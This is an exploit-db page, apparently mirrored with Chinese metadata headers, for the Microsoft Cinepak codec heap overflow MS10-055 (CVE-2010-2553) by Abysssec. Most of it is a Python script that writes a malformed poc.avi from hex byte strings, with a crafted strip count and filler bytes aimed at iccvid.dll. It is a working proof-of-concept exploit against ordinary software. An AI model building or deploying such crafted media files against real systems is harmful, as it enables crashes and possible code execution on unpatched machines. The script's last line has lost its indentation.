Microsoft Cinepak Codec CVDecompress – Heap Overflow (MS10-055)

  • 作者: Abysssec
    日期: 2010-09-26
  • 类别:
    平台:
  • 来源:https://www.exploit-db.com/exploits/15112/
  • '''
     
    ________ __ ____
     |\/|/ __ \ /\| || |_ \ 
     | \/ | || | /\ | || | |_) |
     | |\/| | || |/ /\ \| || |_ < 
     | || | |__| / ____ \ |__| | |_) |
     |_||_|\____/_/\_\____/|____/ 
    
    http://www.exploit-db.com/moaub-26-microsoft-cinepak-codec-cvdecompress-heap-overflow-ms10-055/
    
    '''
    
    '''
    Title : Microsoft Cinepak Codec CVDecompress Heap Overflow
    Version : iccvid.dll XP SP3
    Analysis: http://www.abysssec.com
    Vendor: http://www.microsoft.com
    Impact: High
    Contact : shahin [at] abysssec.com , info[at] abysssec.com
    Twitter : @abysssec
    CVE : CVE-2010-2553
    MOAUB Number: 
    '''
    
    
    import sys
    
    def main():
    
    	aviHeaders = '\x52\x49\x46\x46\x58\x01\x00\x00\x41\x56\x49\x20\x4C\x49\x53\x54\xC8\x00\x00\x00\x68\x64\x72\x6C\x61\x76\x69\x68\x38\x00\x00\x00\xA0\x86\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x01\x00\x00\x4E\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x60\x01\x00\x00\x20\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x4C\x49\x53\x54\x7C\x00\x00\x00\x73\x74\x72\x6C\x73\x74\x72\x68\x38\x00\x00\x00\x76\x69\x64\x73\x63\x76\x69\x64\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xE8\x03\x00\x00\x10\x27\x00\x00\x00\x00\x00\x00\x4E\x00\x00\x00\x20\x74\x00\x00\xFF\xFF\xFF\xFF\x00\x00\x00\x00\x00\x00\x00\x00\x60\x01\x20\x01\x73\x74\x72\x66\x28\x00\x00\x00\x28\x00\x00\x00\x50\x01\x00\x00\x20\x01\x00\x00\x01\x00\x18\x00\x63\x76\x69\x64\x84\x8D\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'
    	padding = '\x4A\x55\x4E\x4B\x00\x00\x00\x00\x4A\x55\x4E\x4B\x00\x00\x00\x00'
    	movi_tag = '\x4C\x49\x53\x54\x5C\x00\x00\x00\x6D\x6F\x76\x69\x30\x30\x64\x63\x10\x00\x00\x00'
    	cinepak_codec_data1 = '\x00\x00\x00\x68\x01\x60\x01\x20'
    	number_of_coded_strips = '\x00\x10' 
    	cinepak_codec_data2 = '\x10\x00\x00\x10\x00\x00\x00\x00\x00\x60\x01\x60\x20\x00\x00\x00\x11\x00\x00\x10\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x11\x00\x00\x10\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x11\x00\x00\x10\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x11\x00\x00\x10\x41\x00'
    	idx_tag = '\x69\x64\x78\x31\x10\x00\x00\x00\x30\x30\x64\x63\x10\x00\x00\x00\x04\x00\x00\x00\x68\x00\x00\x00'
    	
    	avifile = open('poc.avi', 'wb+')
    	avifile.write(aviHeaders)
    	avifile.write(padding)
    	avifile.write(movi_tag)
    	avifile.write(cinepak_codec_data1)
    	avifile.write(number_of_coded_strips)
    	avifile.write(cinepak_codec_data2)
    	avifile.write(idx_tag)
    	
    	avifile.close()
    	print '[-] AVI file generated'
    	
    if __name__ == '__main__':
    main()